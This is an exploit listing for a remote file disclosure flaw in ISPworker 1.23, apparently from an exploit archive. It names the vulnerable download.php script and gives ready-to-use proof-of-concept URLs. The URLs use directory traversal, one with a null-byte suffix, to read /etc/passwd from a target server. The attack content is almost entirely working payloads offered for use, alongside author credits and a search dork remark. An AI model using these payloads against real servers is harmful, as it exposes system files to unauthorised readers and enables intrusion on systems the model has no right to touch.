ISPworker <= 1.23 Remote File Disclosure exploit

No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg ISPworker = 1.23 Remote File Disclosure exploit Download Script : http://www.ispware.de/files/ispworker-1.23.tar.gz Dork : dielamers attempt; :P Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php...

ISPworker 1.23 - Remote File Disclosure

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg ISPworker PoC : http://target/path/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00 http://target/path/module/ticket/download.php?filename=../../../../../../../../../etc/passwd 90r0nt4l0 und3r9r0nd c0mmun1ty Gorontalo /...